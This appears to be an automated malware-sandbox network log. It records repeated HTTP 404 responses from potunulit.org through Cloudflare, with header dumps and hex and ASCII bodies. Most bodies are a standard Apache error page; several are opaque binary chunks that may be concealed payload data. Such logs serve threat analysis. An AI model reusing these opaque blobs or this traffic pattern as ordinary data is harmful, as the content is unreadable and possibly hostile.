                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mf8vmh4DuRJRVEDPmDOSjSUjUs073gQPjaJNC8OaE9jLCNkCw1bfJ16DZkMPw%2FfNw2zc3Uf0RUM4VBaB%2FrkCVoDtgtrx1V8732omAUToBTq5vBpxJEKUZVUbtdgHGFQC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aab1b7d389072-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GE7I0uq%2BU1gb7N0H7R2NsRsinL7CCYKkFotABkxnNgNNowMp4yuExktmMYnT%2FoXR8dsnebrIxwho4MoXpqosfMobG5GgQKzWSNCjvVVH8XpHWYIkPHIsEHovIznvq%2BTZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aab1c1e009072-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 63 37 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 e5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8e 5c 27 66 97 c3 31 0f 3b 93 ca c3 e7 00 16 00 39 a8 23 20 04 3e fb 09 aa 1c af 83 40 f0 10 c0 9b c7 54 b7 7f d8 74 b7 49 42 99 ce 53 f2 72 0d cc 88 99 8d 1a a1 1e db ee 2d 4c 2f ec 79 f8 b0 5b f3 71 54 d3 31 6e a6 75 56 76 a8 4f 92 3a 23 67 ac 5a 43 07 e5 7b b9 b9 e6 be cd 05 e6 28 a9 29 af b2 c8 46 f8 e8 f3 71 d7 21 7d c6 c0 70 a0 fa cb 1f 9e 1d 09 52 2b b5 c8 83 7b 32 44 f2 ff e9 ba fa b8 c4 0d 13 13 bf 1e e1 92 c4 08 4d c4 08 a0 c5 b9 61 b4 dc f5 69 b5 18 17 7e 5f af 9a 13 31 c8 a0 c1 a9 dd 7a 0d 70 4c 19 e0 2c d5 a9 18 0a f5 96 be 27 51 61 9c d4 3e 7c 88 28 c8 48 6d a1 c0 4a 9a 03 fd ec 9e ba 7f ac 87 2b bd 61 0d c0 5d bf 44 34 bd 79 12 6c 23 6c 29 6c 0a 8d c7 fd f4 0e a4 fb 7e 71 eb 80 f5 1a 78 9b 4a d8 19 ae cc 4f 3b 79 82 ae a4 fa 01 4c 11 56 ad f3 57 eb 29 b9 92 ef cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 f2 fa 13 13 39 bb d6 6f 0e 3f 27 a4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 46 4e fc 9d 67 7f 55 40 67 24 78 39 26 e7 ac 04 28 84 42 40 77 9b c7 9b 84 07 3f 66 f9 88 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 8b fa d2 63 1b c3 cb 29 ef e1 e5 5b 1e 44 ab 1e 26 b7 13 ee c3 ca 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 0c 5e ae 63 75 97 7b 85 d2 1c 10 9f f0 21 d9 b0 99 e7 9b 8a cd 7e 7f 74 79 9e 6f 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 fb 2f 1e 76 5c b3 ae 46 1f 50 e5 aa 7a 8f 76 68 e3 cd c8 d9 37 00 e8 e0 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 be 63 d4 03 a6 60 eb ac 98 96 6f 0f ca 82 1f 26 2e 9f 94 ce ec 35 18 c0 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 58 3a 1d b8 6e d8 cb e4 ae a7 a1 33 55 55 da a9 c3 08 cb 2f cb c8 09 Data Ascii: 4c7`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*\'f1;9# >@TtIBSr-L/y[qT1nuVvO:#gZC{()Fq!}pR+{2DMai~_1zpL,'Qa>|(Hm
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9Yry0bYSuAfzRwsQ1ch5ZpD88GDP%2FCxfz1UKm07e7bq1pmOdGHAndT3k6GAu9T52c4pe07WzAFa2ApUR6zq9sZv%2Bf7CqdK3JByUri82BXxTPMzjUwyX3ywKEK2lwNzzB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aab2428719072-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PYJ1NaKPGwug4yKVp32Npv29sLPt8D2pZMJMFA4ht27%2F3VMJa88wSbc%2F92SGDumnH%2B8zkNCV0w3R3qOwwXQhMq%2BK8gdzFqLOlOn7mACJVg%2F3IwbvpoxJApzWhmZDt8oW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aab254a0f9072-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 7d e8 6a fb 64 77 7c 92 c8 27 87 5e 14 b4 5b 9d 8f 26 e9 bc d9 8a b6 94 1c 92 72 1f 36 44 5d 5d 2d 49 9e 2b e9 6c 39 2a 48 5d ab 52 b7 46 3f 90 ea 51 d6 11 95 15 53 46 d6 a6 8e b3 35 cd b5 2d ed 7d a9 c8 2e 85 23 3b 98 b0 ab 35 1e 26 77 be bf 6c 13 d9 f5 51 36 24 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b 41 cd 90 1a 7e 45 f7 ff 78 8d 55 db 24 0d 11 12 b4 1f e8 92 24 f2 4f c5 03 9b c7 a1 61 7e de f5 97 86 19 17 7e 4f af 9a a5 54 c8 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f5 96 be 25 51 61 9f d4 3e 7c 88 28 c8 48 6b c1 cd 4a 9a 07 fd ec c3 bc 76 ac 85 2f bd e1 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 6d af cd 4f 07 79 82 ae 9c 47 08 4c 45 3d af f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df b5 e1 e7 d6 21 4c 80 60 03 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 52 2b ff 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 13 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 37 77 b7 1b 6f d3 cb 29 32 d2 e7 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 27 57 16 e4 a6 6d 11 9f 10 3d d0 b0 99 f9 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fa b0 92 48 a9 b4 bb 31 11 15 28 d2 7e 4c 1f d0 cd a8 7a 8f 74 61 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 63 b9 82 7b 50 bf e5 7e 8f bf 70 d4 03 ab a1 98 76 74 0f ca 82 21 29 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 01 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*}jdw|'^[&r6D]]-I+l9*H]RF?QSF5-}.#;5&wlQ6$3Ob>!Z:V?#BSSQV+A~ExU$$Oa~~OTzN.%Qa>|(HkJ
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A51xKwLa34Kq8IFBcCE2bZJbWUfoT3EKhrs1TA4DXkqoMBZJa5IAq9e6hsohHC3JfyHjZ4kNg4Fu0ynmynKzywcJq3MR27jhi%2FjumDvLhfKjtntkXE1pOhkeGv2hYWEp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aab37f8e19072-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cwtanh1dlEDeyno0dzZFliVjf3ttqyfOQO19wki0shKv4AB2hc%2FT1Zbr66sJnHf7nxK%2FrQ9syHhtxHFMiZYijpqDkHnPzIODVpv%2FsjOxXizND7WupWXm3kHUWtsZ9z7J"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aab38e9e89072-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 36 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 85 1e dd 4d c8 ff 4e a0 26 fc 65 56 40 24 e4 63 09 77 c3 7b 21 19 76 dc a8 b7 b9 c1 31 d4 28 2f 40 35 0d 0a Data Ascii: 36Uys/~(u:RMN&eV@$cw{!v1(/@5
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=70obS20ZKTJteRLXe7H%2BP03eXmHVFSRFXErgukv2aWhm4DEhX5kAeVps%2BWM0%2F1VCd8QoKp6swyWxykxF8%2BNiTJnNyPTr7jSaK%2FLATbXScc%2B3FzDQY%2Bjd1HhO1CbEEG9S"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aab429d269072-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZmEv%2Fv%2FqltxlTcV0ybbiV26se58ykajv%2FvZmfZiUgXpmn9QdOdXwrzGWVJQ%2FmlsRXY6jmuCIgUs0KNqtFJWoUG0ptEwLdLdpSY7%2BqjASpIBTrz0Dek%2BXkF8A0dWNE1eN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aab434deb9072-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 85 99 1d be 9c 06 0b d7 30 56 f0 1b ec c5 2c d8 77 57 9e f9 20 fb c1 d1 e4 e3 05 5a ce 35 2a 18 d5 38 e9 6e 11 1d 4e 6f b0 2c dc 17 49 37 48 d5 12 20 a1 54 6c 64 24 03 2e d7 f9 f6 cd bc c2 68 15 0c de 8d d6 f4 54 7e 60 c1 dc 70 e6 57 00 fb bf 6c 13 d9 0d 20 41 61 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b d3 e3 1c 19 7e 45 f7 ff 78 8d 55 db 24 0d 11 12 b4 1f e8 92 24 f4 4f c5 03 5f 49 a3 61 7e de f5 27 f8 19 17 7e 4f af 9a a5 54 c8 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f5 96 be 25 51 61 9f d4 3e 7c 88 28 c8 48 6b 91 44 48 9a 07 fd ec fe 48 7e ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 5d ac cd 4f 13 79 82 ae 9c 07 83 4e 75 74 af f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df 35 6f e5 c2 21 4c 80 70 03 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 22 2b ff 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 2b 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 8f 74 b7 1b 6f d3 cb 29 32 d4 e7 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 27 94 9f e6 a6 6d 11 9f 10 cd d8 b0 99 07 98 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fa b0 92 48 a9 b4 bb 01 58 15 28 d2 3e c7 1d d0 83 a8 7a 8f 82 69 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 63 b9 82 7b 50 bf e5 7e 71 cf 70 d4 03 2b 2f 9a 76 04 0f ca 82 59 21 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 01 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*0V,wW Z5*8nNo,I7H Tld$.hT~`pWl Aa3Ob>!Z:V?#BSSQV+~ExU$$O_Ia~'~OTzN.%Qa>|(HkDHH~
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k9pBUG9eRCZS7qkggl93JEJP780MioJEzqP6VaEgFQDtIeslKZadtkdMgcsi0IeP%2FKqZuLIKuq2H42%2BKcOW9xDWt3byiEPzRDKHUNTGCLdeIGY8iY7idHTWx6HH1cD%2Fd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aab506cd69072-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
